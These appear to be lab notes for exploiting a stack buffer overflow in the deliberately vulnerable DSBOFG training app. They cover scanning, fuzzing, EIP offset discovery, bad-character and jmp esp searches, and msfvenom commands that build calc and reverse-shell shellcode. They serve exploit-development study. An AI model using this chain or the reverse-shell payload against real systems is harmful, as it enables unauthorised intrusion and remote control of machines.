DSBOFG

Do stack buffer overflow good

All scripts used are here.

  1. Start the DSBOFG application on a Windows guest and attach the debugger as admin. Make sure it is not in a paused state. (Ctrl-F2 to restart after crashes.)

  2. Scan to find open ports. #nmap quick 192.168.132.128 -got port 31337 back

  3. Connect and RE. #nc -nv 192.168.132.128 31337 -Test and understand the program. This particular one echoes back whatever you type: "Hello <whatever we type here>!!!"

  4. We now craft the fuzzer. We want to match how the program works with how we send and receive data, so that we hit the input patterns it expects. We also need to make sure we read the returned traffic, or use a sleep timer between sends if nothing is returned. -found crash: 200 bytes

  5. Generate a unique pattern to find the offset. #locate pattern_create #/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 150 Send it, look at EIP, then copy the value into the sister script. (No editing of the EIP value is needed in this case.) //Sometimes the endianness of the value in EIP needs to be reversed, depending on the program. #/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <eip> -Found offset: 146 bytes
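As an added example (not the notes' own script and not part of the DSBOFG project), the Python below reimplements the cyclic-pattern logic behind pattern_create.rb and pattern_offset.rb, including the endianness caveat: a register value such as 0x39654138 is read in little-endian memory order first, and the reversed order is tried as a fallback. The 146-byte offset from this step falls out of it for a 150-byte pattern.

```python
import string
from typing import Optional

# Added example, not the notes' own script: the logic behind Metasploit's
# pattern_create.rb / pattern_offset.rb, so the 146-byte offset can be checked.
UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes, then it repeats


def pattern_create(length: int) -> str:
    """Build the 'Aa0Aa1Aa2...' pattern: (upper, lower, digit) triplets, so any
    4-byte window in the first 20280 bytes occurs once and maps to a unique offset."""
    chunks = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]  # length > 20280: hand back the full pattern


def _as_hex_register(value: str) -> Optional[bytes]:
    """Return the 4 raw bytes if `value` is an 8-hex-digit register dump, else None."""
    v = value[2:] if value.lower().startswith("0x") else value
    if len(v) == 8 and all(c in string.hexdigits for c in v):
        return bytes.fromhex(v)
    return None


def pattern_offset(value: str, length: int = MAX_UNIQUE) -> Optional[int]:
    """Offset of `value` in the pattern, or None.

    `value` is either the 4 characters as they sit in memory ("8Ae9") or the
    32-bit value the debugger shows in EIP ("0x39654138"). A register value is
    read in little-endian memory order first; if that is not found, the reversed
    order is tried, which is the endianness caveat from step 5."""
    pattern = pattern_create(length)
    raw = _as_hex_register(value)
    if raw is None:
        candidates = [value]
    else:  # latin-1 never fails to decode, so a non-pattern EIP just misses
        candidates = [raw[::-1].decode("latin-1"), raw.decode("latin-1")]
    for cand in candidates:
        idx = pattern.find(cand)
        if idx != -1:
            return idx
    return None
```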

  6. Next we confirm control of EIP. For this case we do:
       buffer = "A"*146 + "BBBB" + "\n"
     -and check that EIP is all 42s.
     Our next check is to see how large we can make the shell payload without getting odd behaviour (also note whether the ESP address changes at all from the last run):
       filler = "A"*146
       eip = "BBBB"
       offset = "C"*4
       buffer = filler + eip + offset + "D"*(1500 - len(filler + eip + offset))  #trying ~1500
     Then we see that we get a break in our data, and our last good address is 004b1f30.

  -We then subtract the address of the first row of D's from this and get 0x53c -dec-> 1340 bytes (usable).
  -Then we check for bad chars with the bad-char string. (\x00 will always be bad, since it is the null byte that terminates a C string.)
  -Also noted that ESP is moving, so we need to find a fixed address that gets us there. //Make sure whatever address you use does not contain any of the bad chars. //Addresses are entered in reverse (little-endian) byte order: 123456 -> 56 34 12
     !mona modules
   We look in the DLLs/EXEs for a module that does not have Rebase or ASLR on.
     !mona jmp -r esp -m <module name> //!mona jmp -r esp -m dostackbufferoverflowgood.exe //Things to look for: jmp esp, pop pop ret. We get 2 options:

Calc shellcode command:
  msfvenom -p windows/exec -b '\x00\x04\x54\x69\x71\xa7' -f python --var-name shellcode CMD=calc.exe EXITFUNC=thread
  //can look at payload options with: msfvenom -p windows/exec --list-options
RSHELL (reverse shell) shellcode command:
  //can look at payload options with: msfvenom -p windows/shell_reverse_tcp --list-options
  #msfvenom -p windows/shell_reverse_tcp -b '\x00\x04\x54\x69\x71\xa7' -f python --var-name buffer LHOST=192.168.19.27 LPORT=12345 EXITFUNC=thread
Drop it in the script and run it for root!
